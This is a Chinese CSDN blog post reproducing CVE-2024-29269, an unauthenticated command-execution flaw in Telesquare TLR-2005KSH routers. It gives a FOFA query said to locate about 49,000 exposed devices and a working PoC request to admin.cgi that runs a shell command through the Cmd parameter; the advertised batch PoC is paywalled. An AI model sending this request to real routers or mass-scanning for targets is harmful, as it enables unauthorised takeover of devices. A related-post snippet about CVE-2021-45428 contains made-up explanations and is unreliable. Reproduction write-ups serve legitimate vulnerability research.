Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)(含批量验证poc)

已于 2024-04-08 14:19:21 修改
阅读量181 收藏
点赞数 2
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-08 14:19:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137507617
版权
本文介绍了Telesquare TLR-2005KSH路由器的远程命令执行漏洞(CVE-2024-29269),该漏洞影响1.0.0到1.1.4版本。攻击者可通过未授权的Cmd参数执行系统命令,获取服务器权限。复现环境中,受影响设备数量为49,437台。建议用户关闭互联网暴露面或限制接口访问权限,并升级到最新版本以修复漏洞。" 81455880,7463364,分治算法解序列计数问题,"['算法', '分治', '序列处理', '数据结构', '问题解决']
摘要由CSDN通过智能技术生成

产品简介

Telesquare Tlr-2005Ksh是韩国Telesquare(Telesquare)公司的一款Sk电讯Lte(Lte)路由器。

漏洞概述

Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限,

复现环境

fofa

app="TELESQUARE-TLR-2005KSH"


资产数:49,437

影响版本

1.0.0< version < 1.1.4

漏洞复现

PoC

GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls%20-la HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.55
Connection: close
Accept: */*
Accept-Encoding: gzip

了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现】京师心智心理健康测评系统MyReport.ashx存在敏感信息泄露
失心少年
03-21 221
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!漏洞链接:http://127.0.0.1/FunctionModular/PersonalReport/Ajax/MyReport.ashx?
CVE-2024-29269Telesquare TLR-2005KSH路由器RCE漏洞复现 [附POC]
薛定谔嘚喵博客
04-11 268
Telesquare Tlr-2005Ksh是韩国Telesquare公司的Sk Telecom Lte路由器Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
Goby 漏洞更新 |Telesquare TLR-2005Ksh 路由器 getUsernamePassword 信息泄露漏洞
m0_46699477的博客
05-12 279
Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款 Sk 电讯 Lte 路由器Telesquare TLR-2005Ksh存在安全漏洞,攻击者可通过未授权getUsernamePassword获取用户名密码等敏感信息。
漏洞复现Telesquare admin.cgi 远程代码执行漏洞(CVE-2024-29269)
qq_67810151的博客
04-07 490
Telesquare TLR-2005Ksh版本1.0.0和1.1.4存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经cmd参数授权的情况下执行系统命令,并获取服务器权限。
Telesquare TLR-2005Ksh 路由器 RCE漏洞复现
0xSec
11-27 1174
Telesquare TLR-2005Ksh存在安全漏洞,未经授权的攻击者可通过setSyncTimeHost执行任意命令获取服务器权限。
Telesquare TLR-2005KSH路由器 RCE漏洞复现(CVE-2024-29269)
0xSec
04-07 939
Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
poc-swagger:[POC]昂首阔步
05-09
标题中的“poc-swagger:[POC]昂首阔步”可能是指一个Proof of Concept(PoC)项目,专门针对Swagger进行的安全测试或漏洞利用。Swagger是一个流行的API开发和文档工具,它允许开发者通过OpenAPI Specification(OAS...
行业分类-设备装置-从TLR4NF-κB通路探讨芪药鸡金粥对化疗后大鼠胃肠道紧密连接蛋白的影响.zip
08-24
标题和描述中提到的研究主题是关于“从TLR4NF-κB通路探讨芪药鸡金粥对化疗后大鼠胃肠道紧密连接蛋白的影响”。这个主题涉及到几个关键的科学领域,包括医药学、分子生物学以及中药研究。下面将详细阐述这些领域的...
论文研究 - 口服病原体参与的促炎途径
05-27
牙龈卟啉单胞菌对口腔粘膜表达MMP-9的诱导主要取决于其关键内毒素,LPS,TLR4的参与以及激活Rac1和cPLA2涉及的MAPK,ERK和p38级联的激活。 ERK介导的cPLA2磷酸化在其与Rac1的膜移位中起重要作用,而Rac1的p38定位则...
stc-isp v6.88K
12-06
STC8H4K64TLR, STC8H3K64S4, STC8H3K64S2, STC8G2K64S4, STC8G2K64S2, STC8C2K64S4, STC8C2K64S2, STC8A8K64D4 STC8A2K64D4, STC8A8K64S4A12, STC8F2K64S4, STC8F2K64S2 4. 增加STC8C系列头文件 5. 主菜单增加...
stc-isp v6.88F
06-25
单片机开发下载工具软件带驱动包。如数字杀毒软件报毒请把其添加到白名单中,如有顾虑请自行到官网下载。... (增加STC8H4K64TLR系列) 5. 仿真驱动程序版本更新为v1.13 (解决单步偶尔会出现通讯中断的问题)
网络安全知识讲解
最新发布
m0_46566693的博客
08-08 1001
网络安全知识讲解
【网络安全】本地文件包及远程文件包漏洞详解
goldfish8848的博客
08-05 836
开发人员将需要重复调用的函数写入一个文件,对该文件进行包时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包在一个文件中,可以保证整体效果的统一和代码量的减少。
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1022
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
C++在网络安全领域的应用
2302_79331124的博客
08-04 1044
总的来说,C++在网络安全领域的应用广泛且深入。其高性能、灵活性和对底层硬件的控制使其成为开发各种安全解决方案的理想选择。随着网络安全威胁的不断演变,C++将继续在保护数字世界的过程中发挥重要作用。如果你对网络安全感兴趣,学习和掌握C++无疑将为你的技术发展方面提供强大的助力。
等保测评与网络安全应急响应机制建设:构建坚实的安全防线
A526847的博客
08-05 378
等保测评与网络安全应急响应机制建设是企业网络安全防护的两大支柱。企业应高度重视这两项工作,将其纳入日常管理中,形成常态化的风险管理机制。只有这样,才能确保在数字化时代中稳健前行,为业务的持续发展和创新提供有力保障。
蓝屏事件:网络安全的启示
m0_67187271的博客
08-04 1368
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
自学黑客(网络安全
2301_77160226的博客
08-05 9731
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
POC-亚姆-TLR-2005KSH-CVE-2021-45428
07-28
POC代表"Proof of Concept",亚姆是指Apache的一个Web服务器,TLR是指Tomcat的日志记录器,2005KSH是指Apache Tomcat 5.5.20版本,CVE-2021-45428是指该版本中的一个已知漏洞。该漏洞可能允许攻击者通过精心构造的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值